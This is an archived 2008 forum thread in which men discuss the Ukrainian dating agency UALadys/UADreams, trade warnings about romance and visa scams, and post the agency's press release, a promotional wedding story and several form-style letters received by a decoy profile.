PDA

View Full Version : UADreams.Com (Ex CC, UALadys)

imported_admin
01-29-2008, 10:16 PM
Confidential Connections --> UALadys --> UADreams

brunods
01-30-2008, 07:41 AM
I have only one thing to say...

GO Eustace Haney!!!!!!! The ladies man of the year!

brunods
01-30-2008, 03:30 PM
I just sent an e-mail to one of the girls in UADreams, the answer was extremely different than the usual ones, no "happy happy happy" chit chat, very real stuff! The girl does speak english so I think she wrote it herself. Kinda cold even! I LIKE IT! LOL

:)

THIS LETTER WAS ---> TRANSALTED <--- FOR INNA

Seems the letters now are salted... interesting! I guess the others were full of sweet, these aren't! ;)

swede
01-30-2008, 07:28 PM
Aren't you just the lucky guy, Brunods. Maybe you have hit bulls eye, and we'll see you happily related (or at least laid) soon. A REAL woman!! And cold on top of that. She maybe even has her own whip and all the other utensils.

LOL to you also brother

PeopleSmoks
01-30-2008, 10:02 PM
quote: Aren't you just the lucky guy, Brunods. Maybe you have hit bulls eye, and we'll see you happily related (or at least laid) soon. A REAL woman!! And cold on top of that. She maybe even has her own whip and all the other utensils.
We know that'll only happen if she is willing to blab to him every answer to every question he asks of her, no matter how personal it may be to her!!![V]

Besides brunods, I thought you were going to go finally get laid by a nice girl in Estonia? or Latvia???[:0]

Now for a slightly more realistic, if not pessimistic, view of this info that brunods has provided...

quote:The girl does speak english so I think she wrote it herself. Kinda cold even! I LIKE IT! LOL... THIS LETTER WAS ---> TRANSALTED <--- FOR INNA
She speaks and writes English, but you will still have to pay UALadys(Dreams) for the priveledge of writing to her, and will NEVER have any contact with this girl, real or not, outside of the struture of the agency unless you PAY them for the priveledge of a real meeting![B)]

quote:Seems the letters now are salted... interesting! I guess the others were full of sweet, these aren't! ;)
After all the research the folks at UALadys, now UADreams, did by monitoring this and other similar public chat sites, it seems they have finally stepped up to the 21st century and realized that western men are a bit suspicious of the tooth decayingly sweet letters the translators had been writing before. Or perhaps it's just an isolated incident, but we'll have to wait and see if a new pattern develops.[8D]

Train returns

brunods
01-31-2008, 04:52 AM
I only sent her a free letter, I am not planning to spend any more money on UAwhatever. :)

And yes I will go to Estonia around May this year.

Just thought it was interesting to finally get a normal letter from a woman!! But since I found this language exchange site, it is much easier (and free) to meet girls there. :P
Lately I've been more on the "offline" mood and met a few girls, will see where it leads... ;)

PeopleSmoks
02-03-2008, 02:19 AM
Yahooy!!!!!!!!!!!! UA is fixed!!!!!!!!!!!!!!!!!!!!!

Press-release about UAladys and UAdreams

All of us at UALadys.com and UADreams.com companies, together declare, that the conflict situation between UALadys and UADreams as sites, that render qualitative services in the field of Dating matchmaking, is completely over. We bring our apologies for the current situation and inconveniences it has brought you. Conflict situation was resolved due to the fact of complete understanding of all questions from both sides.

At the present moment UALadys and UADreams together provide you full services each in own branches. All correspondence with all ladies is saved.

You can continue your correspondence with the ladies from branches:
Odessa, Zaporozhye, Sumy, Poltava, Kremenchug, Lutsk, Donetsk, Simferopol on UADreams.com new website

...and ladies from branches:
Lugansk, Zhitomir, Kharkov, KrivoyRog, Kherson, Berdichev, Kiev remaining on old website.

All your e-mail, video and photo credits are stored on UALadys site. If you want to transfer a part of your paid credits from UALadys to UADreams, please ask UAladys.com/support about transferring your money to your credit card. As soon as money arrives from UAladys, you will be able to use our services in usual way! It usually takes 1-2 days, as they prommised to us. Our companies promise to provide any possible help from both sides.

Each company has organized its own original support center, which is able to respond all your needs in tamely manner. Please feel free to contact us with any questions ? we guarantee you fast and high-quality solution to all questions and difficulties.

Thank you for your support and understanding.

p.s. Copy of it you can read at both websites at first page

The chiefs of UALadys and UADreams

What a relief!!!!!!!!!!!!!!!!

Train returns

PeopleSmoks
02-03-2008, 02:23 AM
Oh yeah, and the dynamite goes...

BOOM!!!!!!!!!!!!!!!

Train returns

brunods
02-05-2008, 03:29 AM
Well at least they are funny! :)

BTW am having lots of fun corresponding with a girl I met on that language exchange site, we talk on headphones using MSN, she's quite nice. And no agencies in between, all direct contact. It is a bit like Hi5.com but oriented for people who want to learn languages.

I really suggest you try it out.

The only difference is that the girls in the site are not looking to get married to a foreign guy. But you do get to know nice people and who knows!

I got lucky met only one girl and she is so damn nice! We talk for hours on MSN and has a lovely voice. Also very attractive girl! :P

Anyway I don't expect too much, just having a good time, she is really fun and interesting so it makes my mood better. :) Might meet her on summer, she will come to europe on holiday. Yeah, I don't have to go there, she comes here with her own money. How about that? :p

ham
02-05-2008, 07:23 AM
quote:I really suggest you try it out.

I tried e-tandem (moreless the same thing ) many years ago and went nowhere.
Most of these "networking devices" (E.G ICQ etc ) are a cover for dating, meaning people use them as a dating tool, even if they won't admit it.
For once my goal was purely instrumental (= improving a foreign language ) and not emotional; I had three correspondences going, but none lasted more than a few weeks, and one girl I got in touch with was a bit weird, for she tended to give me the dizzy feeling from some old Hitchcock movies.
But if you hit it off in 5 minutes with a pretty girl who'll be visiting you soon, good for you I guess...
These devices have never worked for me and never will i guess.
:D[B)][:0]

They work very well for a person I know, who (by his own admission) receives frantic accolades while sending pics of his new Mercedes 5000; by the third meeting women typically ask him to be put on an annuity or something...and yes, he's ugly, with a small disability and it takes dynamite to get a conversation out of him...
[:o)]

PeopleSmoks
02-05-2008, 09:51 PM
quote:Might meet her on summer, she will come to europe on holiday. Yeah, I don't have to go there, she comes here with her own money. How about that?
Doesn't mean it's not going to become a scam... There's a girl, Tanya or Tatyana (posted on stop-scammers already), who claims to have won a lottery. (I've personally won over 100million GBP in the passed 6 mos, but that's another scam...) Anyway, she's going to pay to come to see you, but then finds out she doesn't have enough for her visa and/or passport, because she has to have money to show that she can pay her way in whatever country you live in, and needs your help. Of course she'll pay you back when she arrives.

quote:BTW am having lots of fun corresponding with a girl I met on that language exchange site
Sounds interesting. How much does it cost???

Train returns

Anthony Ferrara
02-16-2008, 12:18 PM
Hehehe Peoplesmoks!

That scam has been tried on me also!! I am Sorry to say she was stuck "She Alledges" in Moscow!!

Sincerely,

Tone

PeopleSmoks
02-16-2008, 12:29 PM
Hey Tone! Actually, there's a new scammer out there claiming she is coming to a city near you using a "work visa". She gets stuck in Moscow if you don't help her... She goes by the name Mariya and is posted on the scammer list by [u]stop-scammers.com</u>.

Train returns

lotuseuropa
02-16-2008, 01:23 PM
I have only been writing to one lady that I met before Christmas at UAladys and is now at UADreams and I have not noticed the style of writing change.

I donīt mind paying the translation fee that many people bitch about, but as this lady is now working in Germany and therefore obviously has a current visa. I would rather she visited me in my home country, or I could visit her in Germany, rather than have to go to Donetsk., a 19 hour flight! Donīt mind paying the agency an introduction fee if this was possible.

j.nichols

swede
02-16-2008, 01:33 PM
If you're aware of the chances you're taking, and your economy allows it, there's no harm in trying.

I find that the worst part is the possibility of hurt emotions. But with
not too high expectations, that can be avoided also.

PeopleSmoks
02-16-2008, 06:50 PM
Hey j.nichols! The biggest issue here seems no longer to be what YOU want or are willing to spend money to do. Sorry, just being honest and straight forward about it. The real issue is... WHAT DOES THE GIRL WANT???

Okay, let's assume she's NOT a leftover UALadys "ringer", and that she's NOT in Germany working as a prostitute as has been inferred previously...

Have you comminicated with her since she went to Germany, and what does SHE want? We can't be neanderthals about women. What they want really does count whether we like it or not! Does she feel the same as you do about meeting?

And if she agrees, it is always best to go to her. Once you allow the thought of what is EASIER for you to enter your thinking, you are doomed to be scammed. Her coming to you first is almost NEVER a good idea unless she can pay for it herself, which then makes you look like a cheap bastard to a real girl.

The option is to send money for airfare, visa, passport, to someone who may be a scammer???

I hope this irl is real, and that everything works out for you both, but this is a tricky world, FSU/MOB dating. Be careful!!!

Train returns

lotuseuropa
02-17-2008, 11:34 AM
Hi

Yes we have corresponded twice now, once a week.

Did UALadys have ringers? Any names?

quote:Originally posted by PeopleSmoks

Hey j.nichols! The biggest issue here seems no longer to be what YOU want or are willing to spend money to do. Sorry, just being honest and straight forward about it. The real issue is... WHAT DOES THE GIRL WANT???

Okay, let's assume she's NOT a leftover UALadys "ringer", and that she's NOT in Germany working as a prostitute as has been inferred previously...

Have you comminicated with her since she went to Germany, and what does SHE want? We can't be neanderthals about women. What they want really does count whether we like it or not! Does she feel the same as you do about meeting?

And if she agrees, it is always best to go to her. Once you allow the thought of what is EASIER for you to enter your thinking, you are doomed to be scammed. Her coming to you first is almost NEVER a good idea unless she can pay for it herself, which then makes you look like a cheap bastard to a real girl.

The option is to send money for airfare, visa, passport, to someone who may be a scammer???

I hope this irl is real, and that everything works out for you both, but this is a tricky world, FSU/MOB dating. Be careful!!!

Train returns

j.nichols

lotuseuropa
02-17-2008, 11:41 AM
Yes you are right the worst thing is possible hurt emotions

Luckily being an ex racing driver I have learned to control the heart. You have to going into a corner at 240 km/hr.

Thinking of returning to the sport to Formula 3 if I can get sponsorship to cover the running costs. So obviously trying to control my feelings.

Just had an e-mail from Larisa P at UALadys (told them to remove my profile)

Subject: I am interested in you.
Date: 17 February 2008

quote:Originally posted by swede

If you're aware of the chances you're taking, and your economy allows it, there's no harm in trying.

I find that the worst part is the possibility of hurt emotions. But with
not too high expectations, that can be avoided also.

j.nichols

swede
02-17-2008, 12:18 PM
Being an enthusiastic biker myself, I have unfortunately not been able to benefit from that emotionally, so I can handle FSU ladies without risk of hurt.

But everybody probably has his own way through the maze of emotions. And if I ever should have reason to go back to the east, it would be as a tourist (not sex-tourist), with the additional hope that any possible pre-existing contact with a woman there would lead to a more lasting relationship.

FSUW have in some respects an almost multiple personality. They are very attached to their own contry, but at the same time they will do very much to get away from it. They want a higher living standard, but they either despise or are suspicious of the WM trying to supply it.
They are romantic, but they are at the same time extremely calculating. They are "hausfraus", but generally not especially effective about it (apart from being good mothers. They take good care of their kids).

You have to be at the spot to unravel this somewhat schizoid situation.

PeopleSmoks
02-17-2008, 12:59 PM
quote:Yes we have corresponded twice now, once a week.
Greetings j.nichols! As long as she also still wants a meeting, then by all means go for it. Either way, it will be best for you to go to her, whether in Donetsk or Germany. And if you make plans to visit for more than a day, go as a tourist (not sex-tourist) as swede says. Have things you can see and do if things don't click with you and your girl, but also things that you might do together should it all work out for you.

quote:FSUW have in some respects an almost multiple personality.
I have said before that FSUWs are first and foremost WOMEN!!! It is only some cultural differences that make them different from western women, but the basic mindset is the same. I have read many articles stating that they are very strong-willed, and to some extent, wonderful liars. Sound familiar guys? They seem to be confused about making choices beyond the here and now, but do commit, more or less, once they finally do decide what they want when they realize they simply can't have it all.

We need to know and understand this about them. In Ukraine, 99.9% of men and 95% of women are literate. They take education very seriously. An FSUW that just spent almost two decades of her life learning, and then getting a degree from the university may say she wants to stop and have your babies, but........

Train returns

Anthony Ferrara
02-17-2008, 03:01 PM
Hello All!
Thank's Peoplesmok for your input but I think due to my situation I do not have to Worry about new scammer's or thier fraudulent behavior, I correspond with only 1 Lady and I have not written to other Women since last May "07'"! I have to admit I have felt My Lady is Genuine and Sincere from the very begining! I still at this time "Over 100 exchanged letter's now" have not found a flaw in any of her letter's to me! I ask question's and she answer's all of them immediately and of course the same is True of my conduct to her!!:D
Well maybe "I can only Hope" I have found my Truest Love and Wife to be!? Of course I am not so Naive to realize that only after I am there will I see all of the Truth's, thru her behavior, body language, eye contact and of course touching each other whether a Kiss or Holding Hand's in public and also Hug's!! Her and I have discussed this Affectionate Behavior many times and she is in total agreement!! I have to admit that if she is all that she represent's herself to be I have finaly found My Angel and this Earth, I mean to say we seem to be perfectly compatible-Well at about 95+%! ;)
Well I think all of you guessed by now I am an Incureable Romantic, Hehehe, No one is perfect!!
To all a Good Day and stay Safe!![8D]

Sincerely,

Tone

PeopleSmoks
02-22-2008, 10:14 AM
Hey Tone! I hate to say it, but I also had such exchanges with the girl I (more or less at this point) plan to visit next week. She had been very open and said she didn't have problems with such signs of affection. Now she wants me to postpone my trip for a second time. The dates of this trip were her idea!!! Postponing the trip isn't going to happen, since everything is paid for and my vacation was approved. Oh well, time for plan B!!!!![8D]

Train returns

Anthony Ferrara
02-22-2008, 10:28 AM
Smoks,

I Hope Sincerely that your trip to the Ukraine is a Total Success and maybe by the time you arrive in person your Sweet Heart will then see you exsist and are for Real!! Maybe She will have to finaly step up and be Responsible for "Her" action's as Well!! After all Smoks, there must be Accountability, Simply said!! She is Responsible for Her action's, Not You!!

Sincerely,

Tone

scambuster
05-23-2008, 09:39 PM
hey Folks, long time no see,
what do we have now? 2 agencies??, double scam?? LMAO...
Now my profile is in 2 doubtful agencies and I get a daily email from either one of them, but I am not throwing 7 bucks (around 2 gallons of gasoline) so I wrote free a girl there from poltava and asked to tell me her last name and she ignored my request or translator chopped, anyways this is enough for me NOT to trust them with the Dreams site, yes Dreams of money for them..
&lt;--TRANSLATED BY SVETALANA S--&gt;
What is the "S" For?... Svetalana Scammer? HAHAHAH....
Now I thought no personal info like emails or telephone?...anybody is crazy to go meet a lady without knowing full name..thats what we need last name to check scammers database..
so on another note I had been switching to chinese ladies, and found many with webcams..but lately I have seen so many spammers and scammers also. LOL...so now I do not trust anyone, worldwide....

scambuster
05-23-2008, 09:39 PM
hey Folks, long time no see,
what do we have now? 2 agencies??, double scam?? LMAO...
Now my profile is in 2 doubtful agencies and I get a daily email from either one of them, but I am not throwing 7 bucks (around 2 gallons of gasoline) so I wrote free a girl there from poltava and asked to tell me her last name and she ignored my request or translator chopped, anyways this is enough for me NOT to trust them with the Dreams site, yes Dreams of money for them..
&lt;--TRANSLATED BY SVETALANA S--&gt;
What is the "S" For?... Svetalana Scammer? HAHAHAH....
Now I thought no personal info like emails or telephone?...anybody is crazy to go meet a lady without knowing full name..thats what we need last name to check scammers database..
so on another note I had been switching to chinese ladies, and found many with webcams..but lately I have seen so many spammers and scammers also. LOL...so now I do not trust anyone, worldwide....

Kevin
05-27-2008, 08:37 AM
Hey SWDAWSON! I have communicated with Daria S. #4252 from Zhitomir. Please get in contact with me through my Yahoo account and we can exchange some information. I have lots of letters written over the almost 2 years with her. I visited her in July 2007 from what I understand you were engaged to her at that time?

Kevin
05-27-2008, 08:37 AM
Hey SWDAWSON! I have communicated with Daria S. #4252 from Zhitomir. Please get in contact with me through my Yahoo account and we can exchange some information. I have lots of letters written over the almost 2 years with her. I visited her in July 2007 from what I understand you were engaged to her at that time?

Prometheus
05-30-2008, 06:14 PM
Dudes!

Haven't checked in in ages. Think the moderator kind of screwed up the forum by creating a new UADreaqms forum and telling people to post here. Just sort of lost track and interest with time.

I have moved and am having the time of my life. Have to tell you that the "Russian Club" exists somewhere in every town and village in America.

Did not take long for my MOB honey to hook up with the local network here. Made the acquaintence of another great example of what we all are asking for by seeking love in the FSU.

"Bill" is a 46 year old divorcee who dabbles in royalties and has a modest home about 40 miles out of town on some land. "Oksana" is a 26 year old Ukrainian girl with long blonde hair, a dynamite body, and legs that just go from here to here.

The first time we met them for drinks, Oksana was wearing a "bejeweled" bra that she had pulled out of the sleeveless body T she was wearing. Her tits are probably a B cup, but every man in the place was fixated on them, since the bra had a neon sign flashing "LOOK AT THIS," going the whole evening.

I find out they met online, married in a matter of months. She arrived, took one look at his place and announced she was not going to live in a farm so far from the city's nightlife. In about six months time, she not only brought her mother over to live with her, but she also suckered poor Bill into buying her a trailer that she keeps downtown for "nights when I am too tired to drive out to the house." Bill keeps and eye on mother, and Oksana attends university, parties on the local club strip, and sleeps in her very fashionable Airstream 5 nights a week.

So I'm trying to figure out what these two have in common, when Oksana starts talking about her new passion... competitive dancing. Seems she taken up the sport with a vengence. "Oh, does Bill dance?" I asked (already knowing the answer). "No, I have a partner." I learn the partner is a good looking 20-something guy from my gal (probably bed mate at the Airstream to boot).

So I ask Bill if he wants a family, and he informs me that Oksana is "not interested in kids."

So I want to shake the guy, "Hey Sugar Daddy? Other than buying her things, paying for her college education, giving her an Airstream to f**k other men in, is there anything at all you are getting out of this???" Boggles the imagination. Well she did wear a tiny crocheted bikini on my boat last weekend, so I certainly see the allure, but hell, eventually you've got to claim your cohones.

So anyway my friends, hope you are all having a great summer.

Good luck in your pursuits, but remember to be careful what you ask for.

Prometheus.

P.S. Mr. Haney has not had so much as a nibble in a while. Check out this email I just got from UADREAMS. See yourself in here somewhere??? Is the Shmeagol or Gollum?

Dreams come true:

We have Wedding in Lutsk!

http://www.uadreams.com/engl/home_marriages.rpx?pr=news11

Daniel My first trip to Lutsk I met my Very Special Princess after writing for several Months and Proposed on February 16th and our Feelings and common goal was to be Married with the great help of the Lutsk office and all the paper work needed to have such a wedding.

My princess Natasha did all and I arrived in the 18th of May and on the 24th of May we were married in her church and has special photos in the castel done. It was the most special moment of my life to be able to be married in such a Wonderful Place not to mention how Beautiful My Brice is. As you can see she is a True Princess. And the Most Beautiful Woman in the World.

If you want to find True Love and Happiness as I have I can only suggest you make a trip to Lutsk. Without the help of Uylia and Dana and UA Dreams I owe a debt of gratitude.

Daniel S.

Natalia

I met Daniel in February. It was unforgettable first impression. On the first meeting already it was nice to understand there are a lot in common between us.

When we decided to get married I hardly believed it was not a dream. I am very thankful to this marriage agency, especially to my friends Bogdana and Uylia for this chance to join our souls.

With sincere gratitude, Natalia 20 May 2008

UaDreams staff congratulate Danial and Natalia
from the bottom of our hearts and wish them all the best!

Prometheus
05-30-2008, 06:14 PM
Dudes!

Haven't checked in in ages. Think the moderator kind of screwed up the forum by creating a new UADreaqms forum and telling people to post here. Just sort of lost track and interest with time.

I have moved and am having the time of my life. Have to tell you that the "Russian Club" exists somewhere in every town and village in America.

Did not take long for my MOB honey to hook up with the local network here. Made the acquaintence of another great example of what we all are asking for by seeking love in the FSU.

"Bill" is a 46 year old divorcee who dabbles in royalties and has a modest home about 40 miles out of town on some land. "Oksana" is a 26 year old Ukrainian girl with long blonde hair, a dynamite body, and legs that just go from here to here.

The first time we met them for drinks, Oksana was wearing a "bejeweled" bra that she had pulled out of the sleeveless body T she was wearing. Her tits are probably a B cup, but every man in the place was fixated on them, since the bra had a neon sign flashing "LOOK AT THIS," going the whole evening.

I find out they met online, married in a matter of months. She arrived, took one look at his place and announced she was not going to live in a farm so far from the city's nightlife. In about six months time, she not only brought her mother over to live with her, but she also suckered poor Bill into buying her a trailer that she keeps downtown for "nights when I am too tired to drive out to the house." Bill keeps and eye on mother, and Oksana attends university, parties on the local club strip, and sleeps in her very fashionable Airstream 5 nights a week.

So I'm trying to figure out what these two have in common, when Oksana starts talking about her new passion... competitive dancing. Seems she taken up the sport with a vengence. "Oh, does Bill dance?" I asked (already knowing the answer). "No, I have a partner." I learn the partner is a good looking 20-something guy from my gal (probably bed mate at the Airstream to boot).

So I ask Bill if he wants a family, and he informs me that Oksana is "not interested in kids."

So I want to shake the guy, "Hey Sugar Daddy? Other than buying her things, paying for her college education, giving her an Airstream to f**k other men in, is there anything at all you are getting out of this???" Boggles the imagination. Well she did wear a tiny crocheted bikini on my boat last weekend, so I certainly see the allure, but hell, eventually you've got to claim your cohones.

So anyway my friends, hope you are all having a great summer.

Good luck in your pursuits, but remember to be careful what you ask for.

Prometheus.

P.S. Mr. Haney has not had so much as a nibble in a while. Check out this email I just got from UADREAMS. See yourself in here somewhere??? Is the Shmeagol or Gollum?

Dreams come true:

We have Wedding in Lutsk!

http://www.uadreams.com/engl/home_marriages.rpx?pr=news11

Daniel My first trip to Lutsk I met my Very Special Princess after writing for several Months and Proposed on February 16th and our Feelings and common goal was to be Married with the great help of the Lutsk office and all the paper work needed to have such a wedding.

My princess Natasha did all and I arrived in the 18th of May and on the 24th of May we were married in her church and has special photos in the castel done. It was the most special moment of my life to be able to be married in such a Wonderful Place not to mention how Beautiful My Brice is. As you can see she is a True Princess. And the Most Beautiful Woman in the World.

If you want to find True Love and Happiness as I have I can only suggest you make a trip to Lutsk. Without the help of Uylia and Dana and UA Dreams I owe a debt of gratitude.

Daniel S.

Natalia

I met Daniel in February. It was unforgettable first impression. On the first meeting already it was nice to understand there are a lot in common between us.

When we decided to get married I hardly believed it was not a dream. I am very thankful to this marriage agency, especially to my friends Bogdana and Uylia for this chance to join our souls.

With sincere gratitude, Natalia 20 May 2008

UaDreams staff congratulate Danial and Natalia
from the bottom of our hearts and wish them all the best!

Prometheus
06-13-2008, 02:38 PM
Eustace Haney Strikes Again.

Eustace was getting a little depressed. Our hog and moonshine boy from Hooterville has not had a bite from UALadys or UADreams in months. Was it because they finally read his profile which concludes, "THIS IS A TEST. DO NOT CONTACT ME UNLESS YOU ARE A SCAM ARTIST," or perhaps the Ukrainian lovelies had no need for a 56 year old dirt farmer with a handful of Viagra.

BUT NO! The real reason was Eustace had forgotten that he changed his email account to a little used one at Excite.com!!! When Eustace opened his inbox this a.m., as Gomer used to say, "SURPRISE, SURPRISE, SURPRISE!" Here a just a short sampling of the many lovelies who are hankering for A TASTE OF HANEY!!!

To:
Date:

Subject:
Yulia G. #4379
Eustace Haney
11 June 2008

Good Morning, my future Lover!

--------------------------------------------------------------------------------

I know that it is not the right thing to take the first step in relations for a decent girl of my age, but even at this age I understand that time never waits. The day is wonderful and I am in high spirits! The sun touches my face, I feel its warmth, I notice that people smile at me.. it is such a wonderful life!!! I am an active girl, my parents love me, my friends respect me, I have a serious hobby ? belly dancing. I?ve been a member of a professional dancing group, we participate in many shows! I never spend my birthday alone, I always have somebody to speak to, people listen to my advice. In general I have a very full and balanced life, there is time for studies and for parties :). But in the whirl of events I cannot but hear this quite but determined voice ? I miss a true gentleman who would make my life complete! I know that the start of my letter may sound a little bit arrogant, I call you ?my future lover? even not seeing you in person. We haven?t looked yeast in each others eyes, we haven?t had romantic walks in nature where no one could see us, we haven?t talked about each other?s most secret dreams.. we haven?t kissed yet! But this is our future, so tell me, do you want such a future for us? I dream to raise a family, to have children, and after a long day put my head on your shoulder with pleasant confidence in the future with you! I hope to hear your thoughts in return, Regards, Yulia

To:
Date:

Subject:
Irina L. #9902
Eustace Haney
08 June 2008

to be a single young lady without love is not so good

--------------------------------------------------------------------------------

Hello !To be a young lady is good, but to be a single young lady without love is not so good ;) I think I am not alone in my desire to find love or there would be no such sites ;) So, if we both are here it means we are looking basically the same: meaningful relationship based on true love. Am I right? ;) Ok, just a few words about me for you to decide if I can be the woman of your dreams :) I like singing (my favorites are Madonna, Kylie Minogue, Elton John and the Beatles), I like learning new things. I like going to fitness club to do some sports and dance. Oriental dances are now very popular here and they help me to be flexible, charming and gracious. I am very traditional when it comes to family and relations, I think there is nothing better than friendly family. In all cultures different as they are family is a real value and life always proves that it is impossible to be happy without one. I work as an accountant for the wholesale company and live with my mother, grandmother, step-father and a younger brother in a flat. My family is very friendly and we are fond of spending time with each other. I like to treat then with something I cook myself, it?s a special pleasure to do something for people you love.

To:
Date:

Subject:
Irinyshka P. #9347
Eustace Haney
05 June 2008

I will make you feel...

Hi to you, my new friend! Tell me, what do you see, when looking at me? I am a girl who is very kind and sincere, I like to tell truth to people and I am searching for a man who will be kind too. I appreciate inner beauty more then appearance. I will make you happy doing it very simply and with a great pleasure, because I like you and I think that communicating with you more we will feel that we have something in common. Do you want to be happy? You will be happy only with me... Happiness cannot be traveled to, owned, earned, worn or consumed. Happiness is the spiritual experience of living every minute with love, grace and gratitude. Happiness for me is in everything I do in this life. I like to dance, like to spend my time outside in the fresh air. Travelling brings me a special feeling of knowing more about this interesting world. But doing all this alone....this is not what I dreamt about... You are such a man that cannot be alone, you have to be with me.... I want to feel your presence in my life, I want to share my life with such a man like you, a man, who could be the authority for me, my best friend, adviser and lover. I will do everything for you, will fulfil every your wish, even will leave my country for you... All for love, all for you... Write me, Irinushka

To:
Date:

Subject:
Tatyana S. #2729
Eustace Haney
27 May 2008

I like you!

THIS MAIL WAS TRANSLATED FOR TATYANA

Hello.How are you? How is your life? I like you!

I hope you are still available, aren't you? I am very new is this agency and in this search in general and actually I dont know how to get your attention, but I will just try to be myself.

It will be a pleasure for me to get acquainted with you. I dont want to bother you, though I want to tell you so much about my life and I want so much you to tell me about your life and your interests and your thoughts. And I want to ask you many questions, but lets leave them for the next mail if you answer me.

Have a wonderful day! Look forward to hear from you, your friend, Tanya.

To:
Date:

Subject:
Irochka M. #4365
Eustace Haney
22 May 2008

Where are you, my other half?

My name is Irina. I've been looking for you for a long time and I am happy that you've appeared in my life, my dear prince. I am 20 and I am impatiently waiting to give my love and kindness to you. I want to be attentive and thoughtful. I am a sincere and kind person, I want to be by your side forever and always, I am willing to bring you love and happiness. I am a very active person, I love sports and I watch well after myself. But I also would like to watch after you and to take care of you, my dear. I can imagine, how early in the morning you are opening your half-sleepy eyes and I kindly whisper to you: ?Good morning, my Love? and I bring a cup of hot fresh coffee into the bed. Do you like coffee in the morning? Do you like when you get it right into the bed? Do you think it is romantic? I think I can make each day unforgettable for you, full of love and happiness. I love fruit and pizza by the way:) Do you like pizza with mushrooms? Can you imagine that two of us will go to gather mushrooms? I love doing this. Did you ever try? We can gather them ourselves and afterwards prepare pizza together:) I love to cook and I even agree to cook every day for you, I can make a romantic supper each day. Do you like children? I love kids, and for you, my dear, I will bring a son and we will bring him up together. He will definitely look like you, and as I think, kids are happiness, and our son will be the crop of our happiness and true love. And if you would ever get fever, I wouldn't leave you even for a minute, I will take care of you, will warm you with my love and thoughtfulness. I indeed hope that you will answer back, my dear! I am impatiently waiting for a minute when we will get a change to know each other better... I hope for the soonest reply, my dear! I kiss you sweetly and softly many times!! Irina.

To:
Date:

Subject:
Vita N. #9342
Eustace Haney
15 May 2008

Hi! Let's try to start romance;)

Hello, my new dear friend. I've chose you from the men here on this site, because I am sure you are special... I am that kind of woman too)... Let's check it?...Tell me, what is love for you? What woman do you want to find here?... Real romance for me means thinking of the other person, the one you love. Remembering the little things, every words ans gestures of your loving one and trying to make his (her) life happier when it is needed most. Romance is a Loving Gift! A very loving gift that helps generate loving feelings and keeps love alive. So...may be let's try to start our romance;) I am a very creative person and my work is closely connected with art. I am a jeweller and I adore my job. I do waxen samples of little things which in future will be golden and silver decorations of a person. I like everything beautiful and like to create this beauty. Also, I like to draw... I can do my best, can inspired more when I start to dream... And when I am at the fresh air, my imagination becomes even better. I like nature, like flowers... So, as you've noticed I am a kind of a romantic girl... Tell me more about you and your character?... I am interested)... Will be very glad to receive letter from you)... Sincerely yours, Vita

Prometheus
06-13-2008, 02:38 PM
Eustace Haney Strikes Again.

Eustace was getting a little depressed. Our hog and moonshine boy from Hooterville has not had a bite from UALadys or UADreams in months. Was it because they finally read his profile which concludes, "THIS IS A TEST. DO NOT CONTACT ME UNLESS YOU ARE A SCAM ARTIST," or perhaps the Ukrainian lovelies had no need for a 56 year old dirt farmer with a handful of Viagra.

BUT NO! The real reason was Eustace had forgotten that he changed his email account to a little used one at Excite.com!!! When Eustace opened his inbox this a.m., as Gomer used to say, "SURPRISE, SURPRISE, SURPRISE!" Here a just a short sampling of the many lovelies who are hankering for A TASTE OF HANEY!!!

To:
Date:

Subject:
Yulia G. #4379
Eustace Haney
11 June 2008

Good Morning, my future Lover!

I know that it is not the right thing to take the first step in relations for a decent girl of my age, but even at this age I understand that time never waits. The day is wonderful and I am in high spirits! The sun touches my face, I feel its warmth, I notice that people smile at me.. it is such a wonderful life!!! I am an active girl, my parents love me, my friends respect me, I have a serious hobby ? belly dancing. I?ve been a member of a professional dancing group, we participate in many shows! I never spend my birthday alone, I always have somebody to speak to, people listen to my advice. In general I have a very full and balanced life, there is time for studies and for parties :). But in the whirl of events I cannot but hear this quite but determined voice ? I miss a true gentleman who would make my life complete! I know that the start of my letter may sound a little bit arrogant, I call you ?my future lover? even not seeing you in person. We haven?t looked yeast in each others eyes, we haven?t had romantic walks in nature where no one could see us, we haven?t talked about each other?s most secret dreams.. we haven?t kissed yet! But this is our future, so tell me, do you want such a future for us? I dream to raise a family, to have children, and after a long day put my head on your shoulder with pleasant confidence in the future with you! I hope to hear your thoughts in return, Regards, Yulia

To:
Date:

Subject:
Irina L. #9902
Eustace Haney
08 June 2008

to be a single young lady without love is not so good

Hello !To be a young lady is good, but to be a single young lady without love is not so good ;) I think I am not alone in my desire to find love or there would be no such sites ;) So, if we both are here it means we are looking basically the same: meaningful relationship based on true love. Am I right? ;) Ok, just a few words about me for you to decide if I can be the woman of your dreams :) I like singing (my favorites are Madonna, Kylie Minogue, Elton John and the Beatles), I like learning new things. I like going to fitness club to do some sports and dance. Oriental dances are now very popular here and they help me to be flexible, charming and gracious. I am very traditional when it comes to family and relations, I think there is nothing better than friendly family. In all cultures different as they are family is a real value and life always proves that it is impossible to be happy without one. I work as an accountant for the wholesale company and live with my mother, grandmother, step-father and a younger brother in a flat. My family is very friendly and we are fond of spending time with each other. I like to treat then with something I cook myself, it?s a special pleasure to do something for people you love.

To:
Date:

Subject:
Irinyshka P. #9347
Eustace Haney
05 June 2008

I will make you feel...

Hi to you, my new friend! Tell me, what do you see, when looking at me? I am a girl who is very kind and sincere, I like to tell truth to people and I am searching for a man who will be kind too. I appreciate inner beauty more then appearance. I will make you happy doing it very simply and with a great pleasure, because I like you and I think that communicating with you more we will feel that we have something in common. Do you want to be happy? You will be happy only with me... Happiness cannot be traveled to, owned, earned, worn or consumed. Happiness is the spiritual experience of living every minute with love, grace and gratitude. Happiness for me is in everything I do in this life. I like to dance, like to spend my time outside in the fresh air. Travelling brings me a special feeling of knowing more about this interesting world. But doing all this alone....this is not what I dreamt about... You are such a man that cannot be alone, you have to be with me.... I want to feel your presence in my life, I want to share my life with such a man like you, a man, who could be the authority for me, my best friend, adviser and lover. I will do everything for you, will fulfil every your wish, even will leave my country for you... All for love, all for you... Write me, Irinushka

To:
Date:

Subject:
Tatyana S. #2729
Eustace Haney
27 May 2008

I like you!

THIS MAIL WAS TRANSLATED FOR TATYANA

Hello.How are you? How is your life? I like you!

I hope you are still available, aren't you? I am very new is this agency and in this search in general and actually I dont know how to get your attention, but I will just try to be myself.

It will be a pleasure for me to get acquainted with you. I dont want to bother you, though I want to tell you so much about my life and I want so much you to tell me about your life and your interests and your thoughts. And I want to ask you many questions, but lets leave them for the next mail if you answer me.

Have a wonderful day! Look forward to hear from you, your friend, Tanya.

To:
